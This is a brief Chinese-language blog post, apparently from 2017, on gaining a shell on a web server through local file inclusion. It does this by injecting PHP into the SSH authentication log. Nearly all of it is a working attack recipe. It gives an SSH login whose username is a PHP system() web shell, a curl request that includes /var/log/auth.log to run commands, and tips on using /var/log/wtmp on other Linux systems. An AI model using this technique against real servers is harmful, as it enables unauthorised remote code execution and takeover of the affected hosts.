LFI SSH日志

通过LFI包含到SSH日志来获取SHELL.

Posted by Rootclay on 2017-03-23

LFI SSH日志

1
ssh '<?php system($_GET[‘c’]); ?>'@192.168.32.137
1
curl http://192.168.32.137/lfi.php?file=/var/log/auth.log&c=ls

Tips:

1
2
3
/var/log/auth.log只有ubuntu系有。
其实对linux,可以包含/var/log/wtmp。一样的效果。有16字符可控,足够了。
只可以没有x权限。